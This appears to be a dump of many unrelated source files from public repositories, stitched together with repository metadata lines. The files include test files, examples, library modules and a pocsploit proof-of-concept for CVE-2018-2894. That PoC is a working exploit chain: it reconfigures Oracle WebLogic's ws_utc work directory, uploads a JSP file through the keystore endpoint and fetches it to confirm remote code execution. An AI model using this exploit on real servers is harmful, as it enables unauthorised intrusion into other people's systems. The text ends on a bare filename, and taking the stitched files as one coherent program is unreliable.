<filename>third_party/blink/tools/diff_wpt_results_unittest.py #!/usr/bin/env vpython # Copyright (C) 2021 Google Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY APPLE COMPUTER, INC. ``AS IS'' AND ANY # EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE COMPUTER, INC. OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY # OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import copy import io import unittest from diff_wpt_results import map_tests_to_results, create_csv CSV_HEADING = 'Test name, Test Result, Baseline Result, Result Comparison' class JsonResultsCompressTest(unittest.TestCase): def test_compress_json(self): output_mp = {} input_mp = {'dir1': {'dir2': {'actual': 'PASS'}}} map_tests_to_results(output_mp, input_mp) self.assertEquals(output_mp, {'dir1/dir2': {'actual': 'PASS'}}) class CreateCsvTest(unittest.TestCase): def test_name_with_comma_escaped_in_csv(self): actual_mp = {'test, name.html': {'actual': 'PASS'}} with io.BytesIO() as csv_out: create_csv(actual_mp, actual_mp, csv_out) csv_out.seek(0) content = csv_out.read() self.assertEquals(content, CSV_HEADING + '\n' + '"test, name.html",PASS,PASS,SAME RESULTS\n') def test_create_csv_with_same_result(self): actual_mp = {'test.html': {'actual': 'PASS'}} with io.BytesIO() as csv_out: create_csv(actual_mp, actual_mp, csv_out) csv_out.seek(0) content = csv_out.read() self.assertEquals(content, CSV_HEADING + '\n' + 'test.html,PASS,PASS,SAME RESULTS\n') def test_create_csv_with_different_result(self): actual_mp = {'test.html': {'actual': 'PASS'}} baseline_mp = copy.deepcopy(actual_mp) baseline_mp['test.html']['actual'] = 'FAIL' with io.BytesIO() as csv_out: create_csv(actual_mp, baseline_mp, csv_out) csv_out.seek(0) content = csv_out.read() self.assertEquals(content, CSV_HEADING + '\n' + 'test.html,PASS,FAIL,DIFFERENT RESULTS\n') def test_create_csv_with_missing_result(self): actual_mp = {'test.html': {'actual': 'PASS'}} with io.BytesIO() as csv_out: create_csv(actual_mp, {}, csv_out) csv_out.seek(0) content = csv_out.read() self.assertEquals(content, CSV_HEADING + '\n' + 'test.html,PASS,MISSING,MISSING RESULTS\n') if __name__ == '__main__': unittest.main()
src/python/k4a/examples/simple_viewer.py
seanyen/Azure-Kinect-Sensor-SDK
1,120
12686421
''' simple_viewer.py A simple viewer to demonstrate the image capture capabilities of an Azure Kinect device using the Python API. This is not the fastest way to display a sequence of images; this is only meant to show how to capture frames in a sequence. Requirements: Users should install the following python packages before using this module: matplotlib Copyright (c) Microsoft Corporation. All rights reserved. Licensed under the MIT License. Kinect For Azure SDK. ''' # This package is used for displaying the images. # It is not part of the k4a package and is not a hard requirement for k4a. # Users need to install these packages in order to use this module. import matplotlib.pyplot as plt # This will import all the public symbols into the k4a namespace. import k4a def simple_viewer(): # Open a device using the static function Device.open(). device = k4a.Device.open() # In order to start capturing frames, need to start the cameras. # The start_cameras() function requires a device configuration which # specifies the modes in which to put the color and depth cameras. # For convenience, the k4a package pre-defines some configurations # for common usage of the Azure Kinect device, but the user can # modify the values to set the device in their preferred modes. device_config = k4a.DEVICE_CONFIG_BGRA32_2160P_WFOV_2X2BINNED_FPS15 device.start_cameras(device_config) # Get a capture. # The -1 tells the device to wait forever until a capture is available. capture = device.get_capture(-1) # Open a matplotlib figure to display images. fig = plt.figure() ax = [] ax.append(fig.add_subplot(1, 3, 1, label="Color")) ax.append(fig.add_subplot(1, 3, 2, label="Depth")) ax.append(fig.add_subplot(1, 3, 3, label="IR")) # The capture has the following fields that can be read right away: # color : the color image # depth : the depth image # ir : the ir image im = [] im.append(ax[0].imshow(capture.color.data)) im.append(ax[1].imshow(capture.depth.data, cmap='jet')) im.append(ax[2].imshow(capture.ir.data, cmap='gray')) ax[0].title.set_text('Color') ax[1].title.set_text('Depth') ax[2].title.set_text('IR') # Note: The data in the images is in BGRA planes, but the matplotlib # library expects them to be in RGBA. This results in an inverted color # display if not properly handled. The user can splice the planes as # appropriate or use opencv which has a function call to transform # BGRA into RGBA. while fig is not None: # Draw the figure with the images. plt.pause(.1) plt.draw() # Get a new capture. capture = device.get_capture(-1) if capture is None: del fig break # Update the images in the figures. im[0].set_data(capture.color.data) im[1].set_data(capture.depth.data) im[2].set_data(capture.ir.data) # There is no need to delete the capture since Python will take care of # that in the object's deleter. # There is no need to stop the cameras since the deleter will stop # the cameras, but it's still prudent to do it explicitly. device.stop_cameras() # There is no need to delete resources since Python will take care # of releasing resources in the objects' deleters. if __name__ == '__main__': simple_viewer()
lib/pypng-0.0.9/code/exnumpy.py
ceremetrix/X
460
12686429
<reponame>ceremetrix/X #!/usr/bin/env python # $URL: http://pypng.googlecode.com/svn/trunk/code/exnumpy.py $ # $Rev: 126 $ # Numpy example. # Original code created by <NAME>, modified by <NAME>. ''' Example code integrating RGB PNG files, PyPNG and NumPy (abstracted from Mel Raab's functioning code) ''' # http://www.python.org/doc/2.4.4/lib/module-itertools.html import itertools import numpy import png ''' If you have a PNG file for an RGB image, and want to create a numpy array of data from it. ''' # Read the file "picture.png" from the current directory. The `Reader` # class can take a filename, a file-like object, or the byte data # directly; this suggests alternatives such as using urllib to read # an image from the internet: # png.Reader(file=urllib.urlopen('http://www.libpng.org/pub/png/PngSuite/basn2c16.png')) pngReader=png.Reader(filename='picture.png') # Tuple unpacking, using multiple assignment, is very useful for the # result of asDirect (and other methods). # See # http://docs.python.org/tutorial/introduction.html#first-steps-towards-programming row_count, column_count, pngdata, meta = pngReader.asDirect() bitdepth=meta['bitdepth'] plane_count=meta['planes'] # Make sure we're dealing with RGB files assert plane_count == 3 ''' Boxed row flat pixel: list([R,G,B, R,G,B, R,G,B], [R,G,B, R,G,B, R,G,B]) Array dimensions for this example: (2,9) Create `image_2d` as a two-dimensional NumPy array by stacking a sequence of 1-dimensional arrays (rows). The NumPy array mimics PyPNG's (boxed row flat pixel) representation; it will have dimensions ``(row_count,column_count*plane_count)``. ''' # The use of ``numpy.uint16``, below, is to convert each row to a NumPy # array with data type ``numpy.uint16``. This is a feature of NumPy, # discussed further in # http://docs.scipy.org/doc/numpy/user/basics.types.html . # You can use avoid the explicit conversion with # ``numpy.vstack(pngdata)``, but then NumPy will pick the array's data # type; in practice it seems to pick ``numpy.int32``, which is large enough # to hold any pixel value for any PNG image but uses 4 bytes per value when # 1 or 2 would be enough. # --- extract 001 start image_2d = numpy.vstack(itertools.imap(numpy.uint16, pngdata)) # --- extract 001 end # Do not be tempted to use ``numpy.asarray``; when passed an iterator # (`pngdata` is often an iterator) it will attempt to create a size 1 # array with the iterator as its only element. # An alternative to the above is to create the target array of the right # shape, then populate it row by row: if 0: image_2d = numpy.zeros((row_count,plane_count*column_count), dtype=numpy.uint16) for row_index, one_boxed_row_flat_pixels in enumerate(pngdata): image_2d[row_index,:]=one_boxed_row_flat_pixels del pngReader del pngdata ''' Reconfigure for easier referencing, similar to Boxed row boxed pixel: list([ (R,G,B), (R,G,B), (R,G,B) ], [ (R,G,B), (R,G,B), (R,G,B) ]) Array dimensions for this example: (2,3,3) ``image_3d`` will contain the image as a three-dimensional numpy array, having dimensions ``(row_count,column_count,plane_count)``. ''' # --- extract 002 start image_3d = numpy.reshape(image_2d, (row_count,column_count,plane_count)) # --- extract 002 end ''' ============= ''' ''' Convert NumPy image_3d array to PNG image file. If the data is three-dimensional, as it is above, the best thing to do is reshape it into a two-dimensional array with a shape of ``(row_count, column_count*plane_count)``. Because a two-dimensional numpy array is an iterator, it can be passed directly to the ``png.Writer.write`` method. ''' row_count, column_count, plane_count = image_3d.shape assert plane_count==3 pngfile = open('picture_out.png', 'wb') try: # This example assumes that you have 16-bit pixel values in the data # array (that's what the ``bitdepth=16`` argument is for). # If you don't, then the resulting PNG file will likely be # very dark. Hey, it's only an example. pngWriter = png.Writer(column_count, row_count, greyscale=False, alpha=False, bitdepth=16) # As of 2009-04-13 passing a numpy array that has an element type # that is a numpy integer type (for example, the `image_3d` array has an # element type of ``numpy.uint16``) generates a deprecation warning. # This is probably a bug in numpy; it may go away in the future. # The code still works despite the warning. # See http://code.google.com/p/pypng/issues/detail?id=44 # --- extract 003 start pngWriter.write(pngfile, numpy.reshape(image_3d, (-1, column_count*plane_count))) # --- extract 003 end finally: pngfile.close()
src/ansiblelint/rules/key_order.py
willthames/ansible-lint
1,192
12686432
"""All tasks should be have name come first.""" import sys from typing import Any, Dict, Optional, Union from ansiblelint.file_utils import Lintable from ansiblelint.rules import AnsibleLintRule from ansiblelint.testing import RunFromText class KeyOrderRule(AnsibleLintRule): """Ensure specific order of keys in mappings.""" id = "key-order" shortdesc = __doc__ severity = "LOW" tags = ["formatting", "experimental"] version_added = "v6.2.0" needs_raw_task = True def matchtask( self, task: Dict[str, Any], file: Optional[Lintable] = None ) -> Union[bool, str]: raw_task = task["__raw_task__"] if "name" in raw_task: attribute_list = [*raw_task] if bool(attribute_list[0] != "name"): return "'name' key is not first" return False # testing code to be loaded only with pytest or when executed the rule file if "pytest" in sys.modules: import pytest PLAY_FAIL = """--- - hosts: localhost tasks: - no_log: true shell: echo hello name: task with no_log on top - when: true name: task with when on top shell: echo hello - delegate_to: localhost name: delegate_to on top shell: echo hello - loop: - 1 - 2 name: loopy command: echo {{ item }} - become: true name: become first shell: echo hello - register: test shell: echo hello name: register first """ PLAY_SUCCESS = """--- - hosts: localhost tasks: - name: test command: echo "test" - name: test2 debug: msg: "Debug without a name" - name: Flush handlers meta: flush_handlers - no_log: true # noqa key-order shell: echo hello name: task with no_log on top """ @pytest.mark.parametrize("rule_runner", (KeyOrderRule,), indirect=["rule_runner"]) def test_task_name_has_name_first_rule_pass(rule_runner: RunFromText) -> None: """Test rule matches.""" results = rule_runner.run_playbook(PLAY_SUCCESS) assert len(results) == 0 @pytest.mark.parametrize("rule_runner", (KeyOrderRule,), indirect=["rule_runner"]) def test_task_name_has_name_first_rule_fail(rule_runner: RunFromText) -> None: """Test rule matches.""" results = rule_runner.run_playbook(PLAY_FAIL) assert len(results) == 6
examples/fib.py
chen3feng/pywasm
337
12686438
<filename>examples/fib.py import pywasm # pywasm.on_debug() runtime = pywasm.load('./examples/fib.wasm') r = runtime.exec('fib', [10]) print(r)
cloudbio/custom/galaxy.py
glebkuznetsov/cloudbiolinux
122
12686457
<gh_stars>100-1000 """ Install any components that fall under 'galaxy' directive in main.yaml """ from cloudbio.galaxy import _setup_users from cloudbio.galaxy import _setup_galaxy_env_defaults from cloudbio.galaxy import _install_galaxy from cloudbio.galaxy import _configure_galaxy_options def install_galaxy_webapp(env): _prep_galaxy(env) _install_galaxy(env) _configure_galaxy_options(env) def _prep_galaxy(env): _setup_users(env) _setup_galaxy_env_defaults(env)
mergify_engine/actions/squash.py
truthiswill/mergify-engine
266
12686459
<reponame>truthiswill/mergify-engine<gh_stars>100-1000 # -*- encoding: utf-8 -*- # # Copyright © 2021 Mergify SAS # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import typing import voluptuous from mergify_engine import actions from mergify_engine import check_api from mergify_engine import context from mergify_engine import rules from mergify_engine import signals from mergify_engine import squash_pull from mergify_engine.actions import utils as action_utils from mergify_engine.dashboard import subscription from mergify_engine.rules import types class SquashAction(actions.Action): flags = ( actions.ActionFlag.ALLOW_AS_ACTION | actions.ActionFlag.ALLOW_AS_COMMAND | actions.ActionFlag.ALWAYS_RUN | actions.ActionFlag.ALLOW_ON_CONFIGURATION_CHANGED | actions.ActionFlag.DISALLOW_RERUN_ON_OTHER_RULES ) validator = { voluptuous.Required("bot_account", default=None): voluptuous.Any( None, types.Jinja2 ), voluptuous.Required("commit_message", default="all-commits"): voluptuous.Any( "all-commits", "first-commit", "title+body" ), } @staticmethod def command_to_config(string: str) -> typing.Dict[str, typing.Any]: if string: return {"commit_message": string.strip()} else: return {} async def run( self, ctxt: context.Context, rule: rules.EvaluatedRule ) -> check_api.Result: try: bot_account = await action_utils.render_bot_account( ctxt, self.config["bot_account"], required_feature=subscription.Features.BOT_ACCOUNT, missing_feature_message="Squash with `bot_account` set are disabled", required_permissions=[], ) except action_utils.RenderBotAccountFailure as e: return check_api.Result(e.status, e.title, e.reason) if ctxt.pull["commits"] <= 1: return check_api.Result( check_api.Conclusion.SUCCESS, "Pull request is already one-commit long", "", ) try: commit_title_and_message = await ctxt.pull_request.get_commit_message() except context.RenderTemplateFailure as rmf: return check_api.Result( check_api.Conclusion.ACTION_REQUIRED, "Invalid commit message", str(rmf), ) if commit_title_and_message is not None: title, message = commit_title_and_message message = f"{title}\n\n{message}" elif self.config["commit_message"] == "all-commits": message = f"{(await ctxt.pull_request.title)} (#{(await ctxt.pull_request.number)})\n" message += "\n\n* ".join( [commit["commit_message"] for commit in await ctxt.commits] ) elif self.config["commit_message"] == "first-commit": message = (await ctxt.commits)[0]["commit_message"] elif self.config["commit_message"] == "title+body": message = f"{(await ctxt.pull_request.title)} (#{(await ctxt.pull_request.number)})" message += f"\n\n{await ctxt.pull_request.body}" else: raise RuntimeError("Unsupported commit_message option") try: await squash_pull.squash( ctxt, message, bot_account, ) except squash_pull.SquashFailure as e: return check_api.Result( check_api.Conclusion.FAILURE, "Pull request squash failed", e.reason ) else: await signals.send(ctxt, "action.squash") return check_api.Result( check_api.Conclusion.SUCCESS, "Pull request squashed successfully", "" ) async def cancel( self, ctxt: context.Context, rule: "rules.EvaluatedRule" ) -> check_api.Result: # pragma: no cover return actions.CANCELLED_CHECK_REPORT
gaphas/tree.py
gaphor/gaphas
108
12686461
"""Simple class containing the tree structure for the canvas items.""" from typing import Dict, Generic, Iterable, List, Optional, Sequence, TypeVar, Union T = TypeVar("T") class Tree(Generic[T]): """A Tree structure. Nodes are stores in a depth-first order. ``None`` is the root node. @invariant: len(self._children) == len(self._nodes) + 1 """ def __init__(self) -> None: # List of nodes in the tree, sorted in the order they ought to be # rendered self._nodes: List[T] = [] # Per entry a list of children is maintained. self._children: Dict[Union[T, None], List[T]] = {None: []} # For easy and fast lookups, also maintain a child -> parent mapping self._parents: Dict[T, T] = {} @property def nodes(self) -> Sequence[T]: return list(self._nodes) def get_parent(self, node: T) -> Optional[T]: """Return the parent item of ``node``. >>> tree = Tree() >>> tree.add('n1') >>> tree.add('n2', parent='n1') >>> tree.get_parent('n2') 'n1' """ return self._parents.get(node) def get_children(self, node: Optional[T]) -> Iterable[T]: """Return all child objects of ``node``. >>> tree = Tree() >>> tree.add('n1') >>> tree.add('n2', parent='n1') >>> tree.add('n3', parent='n1') >>> tree.get_children('n1') ['n2', 'n3'] >>> tree.get_children('n2') [] """ return self._children[node] def get_siblings(self, node: T) -> List[T]: """Get all siblings of ``node``, including ``node``. >>> tree = Tree() >>> tree.add('n1') >>> tree.add('n2', parent='n1') >>> tree.add('n3', parent='n1') >>> tree.get_siblings('n2') ['n2', 'n3'] """ parent = self.get_parent(node) return self._children[parent] def get_next_sibling(self, node: T) -> T: """Return the node on the same level after ``node``. >>> tree = Tree() >>> tree.add('n1') >>> tree.add('n2', parent='n1') >>> tree.add('n3', parent='n1') >>> tree.get_next_sibling('n2') 'n3' >>> tree.get_next_sibling('n3') # doctest: +ELLIPSIS Traceback (most recent call last): ... IndexError: list index out of range """ parent = self.get_parent(node) siblings = self._children[parent] return siblings[siblings.index(node) + 1] def get_previous_sibling(self, node: T) -> T: """Return the node on the same level before ``node``. >>> tree = Tree() >>> tree.add('n1') >>> tree.add('n2', parent='n1') >>> tree.add('n3', parent='n1') >>> tree.get_previous_sibling('n3') 'n2' >>> tree.get_previous_sibling('n2') # doctest: +ELLIPSIS Traceback (most recent call last): ... IndexError: list index out of range """ parent = self.get_parent(node) siblings = self._children[parent] index = siblings.index(node) - 1 if index < 0: raise IndexError("list index out of range") return siblings[index] def get_all_children(self, node: T) -> Iterable[T]: """Iterate all children (and children of children and so forth) >>> tree = Tree() >>> tree.add('n1') >>> tree.add('n2', parent='n1') >>> tree.add('n3', parent='n2') >>> tree.get_children('n1') ['n2'] >>> tree.get_all_children('n1') # doctest: +ELLIPSIS <generator object Tree.get_all_children at 0x...> >>> list(tree.get_all_children('n1')) ['n2', 'n3'] """ children = self.get_children(node) for c in children: yield c yield from self.get_all_children(c) def get_ancestors(self, node: T) -> Iterable[T]: """Iterate all parents and parents of parents, etc. >>> tree = Tree() >>> tree.add('n1') >>> tree.add('n2', parent='n1') >>> tree.add('n3', parent='n2') >>> tree.get_parent('n3') 'n2' >>> tree.get_ancestors('n3') # doctest: +ELLIPSIS <generator object Tree.get_ancestors at 0x...> >>> list(tree.get_ancestors('n3')) ['n2', 'n1'] >>> list(tree.get_ancestors('n1')) [] """ parent = self.get_parent(node) while parent: yield parent parent = self.get_parent(parent) def order(self, items: Iterable[T]) -> Iterable[T]: items_set = set(items) return (n for n in self._nodes if n in items_set) def _add_to_nodes( self, node: T, parent: Optional[T], index: Optional[int] = None ) -> None: """Helper method to place nodes on the right location in the nodes list Called only from add() and move()""" nodes = self._nodes siblings = self._children[parent] try: atnode = siblings[index] # type: ignore[index] except (TypeError, IndexError): index = len(siblings) if parent: try: next_uncle = self.get_next_sibling(parent) except IndexError: # parent has no younger brothers.. # place it before the next uncle of grant_parent: return self._add_to_nodes(node, self.get_parent(parent)) else: nodes.insert(nodes.index(next_uncle), node) else: # append to root node: nodes.append(node) else: nodes.insert(nodes.index(atnode), node) def _add( self, node: T, parent: Optional[T] = None, index: Optional[int] = None ) -> None: """Helper method for both add() and move().""" assert node not in self._nodes siblings = self._children[parent] self._add_to_nodes(node, parent, index) # Fix parent-child and child-parent relationship try: siblings.insert(index, node) # type: ignore[arg-type] except TypeError: siblings.append(node) # Create new entry for it's own children: if parent: self._parents[node] = parent def add( self, node: T, parent: Optional[T] = None, index: Optional[int] = None ) -> None: """Add node to the tree. parent is the parent node, which may be None if the item should be added to the root item. For usage, see the unit tests. """ self._add(node, parent, index) self._children[node] = [] def _remove(self, node: T) -> None: # Remove from parent item self.get_siblings(node).remove(node) # Remove data entries: del self._children[node] self._nodes.remove(node) try: del self._parents[node] except KeyError: pass def remove(self, node: T) -> None: """Remove ``node`` from the tree. For usage, see the unit tests. """ # First remove children: for c in reversed(list(self._children[node])): self.remove(c) self._remove(node) def _reparent_nodes(self, node: T, parent: Optional[T]) -> None: """Helper for move(). The _children and _parent trees can be left intact as far as children of the reparented node are concerned. Only the position in the _nodes list changes. """ self._nodes.remove(node) self._add_to_nodes(node, parent) for c in self._children[node]: self._reparent_nodes(c, node) def move(self, node: T, parent: Optional[T], index: Optional[int] = None) -> None: """Set new parent for a ``node``. ``Parent`` can be ``None``, indicating it's added to the top. >>> tree = Tree() >>> tree.add('n1') >>> tree.add('n2', parent='n1') >>> tree.add('n3', parent='n1') >>> tree.nodes ['n1', 'n2', 'n3'] >>> tree.move('n2', 'n3') >>> tree.get_parent('n2') 'n3' >>> tree.get_children('n3') ['n2'] >>> tree.nodes ['n1', 'n3', 'n2'] If a node contains children, those are also moved: >>> tree.add('n4') >>> tree.nodes ['n1', 'n3', 'n2', 'n4'] >>> tree.move('n1', 'n4') >>> tree.get_parent('n1') 'n4' >>> list(tree.get_all_children('n4')) ['n1', 'n3', 'n2'] >>> tree.nodes ['n4', 'n1', 'n3', 'n2'] """ if parent is self.get_parent(node): return # Remove all node references: old_parent = self.get_parent(node) self._children[old_parent].remove(node) self._nodes.remove(node) if old_parent: del self._parents[node] self._add(node, parent, index) # reorganize children in nodes list for c in self._children[node]: self._reparent_nodes(c, node)
tests/test_init.py
fariddarabi/fastapi-chameleon
118
12686467
import pytest import fastapi_chameleon as fc from fastapi_chameleon.exceptions import FastAPIChameleonException def test_cannot_decorate_with_missing_init(): fc.engine.clear() with pytest.raises(FastAPIChameleonException): @fc.template('home/index.pt') def view_method(a, b, c): return {"a": a, "b": b, "c": c} view_method(1, 2, 3) def test_can_call_init_with_good_path(test_templates_path): fc.global_init(str(test_templates_path), cache_init=False) # Clear paths so as to no affect future tests fc.engine.clear() def test_cannot_call_init_with_bad_path(test_templates_path): bad_path = test_templates_path / "missing" with pytest.raises(Exception): fc.global_init(str(bad_path), cache_init=False)
mongomock/object_id.py
moonso/mongomock
574
12686474
<reponame>moonso/mongomock import uuid class ObjectId(object): def __init__(self, id=None): super(ObjectId, self).__init__() if id is None: self._id = uuid.uuid1() else: self._id = uuid.UUID(id) def __eq__(self, other): return isinstance(other, ObjectId) and other._id == self._id def __ne__(self, other): return not self == other def __hash__(self): return hash(self._id) def __repr__(self): return 'ObjectId({0})'.format(self._id) def __str__(self): return str(self._id)
test/test_render_visual.py
QiukuZ/svox2
1,724
12686488
<gh_stars>1000+ import svox2 import torch import numpy as np from util import Timing from matplotlib import pyplot as plt device='cuda:0' GRID_FILE = 'lego.npy' grid = svox2.SparseGrid(reso=256, device='cpu', radius=1.3256) data = torch.from_numpy(np.load(GRID_FILE)).view(-1, grid.data_dim) grid.sh_data.data = data[..., 1:] grid.density_data.data = data[..., :1] # grid.resample(128, use_z_order=True) grid = grid.cuda() c2w = torch.tensor([ [ -0.9999999403953552, 0.0, 0.0, 0.0 ], [ 0.0, -0.7341099977493286, 0.6790305972099304, 2.737260103225708 ], [ 0.0, 0.6790306568145752, 0.7341098785400391, 2.959291696548462 ], [ 0.0, 0.0, 0.0, 1.0 ], ], device=device) with torch.no_grad(): width = height = 800 fx = fy = 1111 origins = c2w[None, :3, 3].expand(height * width, -1).contiguous() yy, xx = torch.meshgrid( torch.arange(height, dtype=torch.float64, device=c2w.device), torch.arange(width, dtype=torch.float64, device=c2w.device), ) xx = (xx - width * 0.5) / float(fx) yy = (yy - height * 0.5) / float(fy) zz = torch.ones_like(xx) dirs = torch.stack((xx, -yy, -zz), dim=-1) dirs /= torch.norm(dirs, dim=-1, keepdim=True) dirs = dirs.reshape(-1, 3) del xx, yy, zz dirs = torch.matmul(c2w[None, :3, :3].double(), dirs[..., None])[..., 0].float() dirs = dirs / torch.norm(dirs, dim=-1, keepdim=True) rays = svox2.Rays(origins, dirs) for i in range(5): with Timing("ours"): im = grid.volume_render(rays, use_kernel=True) im = im.reshape(height, width, 3) im = im.detach().clamp_(0.0, 1.0).cpu() plt.imshow(im) plt.show()
nider/__init__.py
rockykitamura/nider
123
12686494
<gh_stars>100-1000 # -*- coding: utf-8 -*- """Top-level package for nider.""" __author__ = """<NAME>""" __email__ = '<EMAIL>' __version__ = '0.5.0'
pfrl/wrappers/monitor.py
ummavi/pfrl-1
824
12686500
import time from logging import getLogger from gym.wrappers import Monitor as _GymMonitor from gym.wrappers.monitoring.stats_recorder import StatsRecorder as _GymStatsRecorder class Monitor(_GymMonitor): """`Monitor` with PFRL's `ContinuingTimeLimit` support. `Agent` in PFRL might reset the env even when `done=False` if `ContinuingTimeLimit` returns `info['needs_reset']=True`, which is not expected for `gym.Monitor`. For details, see https://github.com/openai/gym/blob/master/gym/wrappers/monitor.py """ def _start( self, directory, video_callable=None, force=False, resume=False, write_upon_reset=False, uid=None, mode=None, ): if self.env_semantics_autoreset: raise NotImplementedError( "Detect 'semantics.autoreset=True' in `env.metadata`, " "which means the env is from deprecated OpenAI Universe." ) ret = super()._start( directory=directory, video_callable=video_callable, force=force, resume=resume, write_upon_reset=write_upon_reset, uid=uid, mode=mode, ) env_id = self.stats_recorder.env_id self.stats_recorder = _StatsRecorder( directory, "{}.episode_batch.{}".format(self.file_prefix, self.file_infix), autoreset=False, env_id=env_id, ) if mode is not None: self._set_mode(mode) return ret class _StatsRecorder(_GymStatsRecorder): """`StatsRecorder` with PFRL's `ContinuingTimeLimit` support. For details, see https://github.com/openai/gym/blob/master/gym/wrappers/monitoring/stats_recorder.py """ def __init__( self, directory, file_prefix, autoreset=False, env_id=None, logger=getLogger(__name__), ): super().__init__(directory, file_prefix, autoreset=autoreset, env_id=env_id) self._save_completed = True self.logger = logger def before_reset(self): assert not self.closed if self.done is not None and not self.done and self.steps > 0: self.logger.debug( "Tried to reset the env which is not done=True. " "StatsRecorder completes the last episode." ) self.save_complete() self.done = False if self.initial_reset_timestamp is None: self.initial_reset_timestamp = time.time() def after_step(self, observation, reward, done, info): self._save_completed = False return super().after_step(observation, reward, done, info) def save_complete(self): if not self._save_completed: super().save_complete() self._save_completed = True def close(self): self.save_complete() super().close()
2018/CVE-2018-2894/poc/pocsploit/CVE-2018-2894.py
hjyuan/reapoc
421
12686511
import requests # Vuln Base Info def info(): return { "author": "cckuailong", "name": '''Oracle WebLogic RCE''', "description": '''Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.''', "severity": "critical", "references": [ "https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/", "https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894" ], "classification": { "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cvss-score": "", "cve-id": "CVE-2018-2894", "cwe-id": "" }, "metadata":{ "vuln-target": "", }, "tags": ["cve", "cve2018", "oracle", "weblogic", "rce"], } # Vender Fingerprint def fingerprint(url): return True # Proof of Concept def poc(url): result = {} try: url = format_url(url) path = """/ws_utc/resources/setting/options""" method = "POST" data = """setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80""" headers = {'Content-Type': 'application/x-www-form-urlencoded'} resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) path = """/ws_utc/resources/setting/keystore""" method = "POST" data = """------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_name" {{randstr}} ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_edit_mode" false ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_password_front" ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_password" ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_password_changed" false ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_filename"; filename="{{randstr}}.jsp" Content-Type: application/octet-stream <%@ page import="java.util.*,java.io.*"%> <%@ page import="java.security.MessageDigest"%> <% String cve = "CVE-2018-2894"; MessageDigest alg = MessageDigest.getInstance("MD5"); alg.reset(); alg.update(cve.getBytes()); byte[] digest = alg.digest(); StringBuffer hashedpasswd = new StringBuffer(); String hx; for (int i=0;i<digest.length;i++){ hx = Integer.toHexString(0xFF & digest[i]); //0x03 is equal to 0x3, but we need 0x03 for our md5sum if(hx.length() == 1){hx = "0" + hx;} hashedpasswd.append(hx); } out.println(hashedpasswd.toString()); %> ------WebKitFormBoundaryuim0dyiDSPBPu31g--""" headers = {'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g'} resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) path = """/ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp""" method = "GET" data = """""" headers = {} resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) if ("""26ec00a3a03f6bfc5226fd121567bb58""" in resp2.text): result["success"] = True result["info"] = info() result["payload"] = url+path except: result["success"] = False return result # Exploit, can be same with poc() def exp(url): return poc(url) # Utils def format_url(url): url = url.strip() if not ( url.startswith('http://') or url.startswith('https://') ): url = 'http://' + url url = url.rstrip('/') return url
tensorflow/compiler/tests/reverse_ops_test.py
abhaikollara/tensorflow
848
12686577
